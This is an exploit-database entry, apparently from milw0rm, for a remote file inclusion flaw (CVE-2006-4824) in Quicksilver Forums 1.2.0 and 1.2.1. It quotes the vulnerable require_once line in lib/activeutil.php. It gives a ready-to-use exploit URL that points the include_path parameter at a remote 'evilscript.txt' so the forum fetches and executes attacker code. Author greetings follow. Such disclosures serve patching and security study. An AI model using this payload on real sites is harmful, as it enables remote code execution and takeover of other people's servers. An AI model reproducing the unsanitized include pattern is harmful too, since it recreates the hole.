![$site['logo_alt']](/img/neosense-logo.png){kind=logo}
NeoSense Quicksilver Forums 1.2.1 - Remote File Inclusion
Author: mdx type: webapps platform: php port: date_added: 2006-09-12 date_updated: 2016-12-15 verified: 1 codes: OSVDB-28785;CVE-2006-4824 tags: aliases: screenshot_url: application_url: raw file: 2356.txt
#################################################### # # # [ WWW.SecurityWall.orG ] # # # #################################################### Quicksilver Forums [(v1.2.0)+(1.2.1)] (set[include_path]) Remote File Inclusion Vulnerabilities #################################################### Author: mdx #################################################### Class : Remote #################################################### cont@ct: bilkopat[at]hotmail[dot]com #################################################### [v1.2.0]+[v1.2.1] Code: activeutil.php? require_once $set['include_path'] . '/lib/bbcode.php'; Exploit: http://www.site.com/[path]/lib/activeutil.php?set[include_path]=http://site.com/evilscript.txt? #################################################### Greetz: [Cyber-warrior TIM USERS] , Dreamlord , xoron , The_bat_hacker , redx , dipsomania , Kizil_alev, ElHaCKeR :=) #################################################### # milw0rm.com [2006-09-13]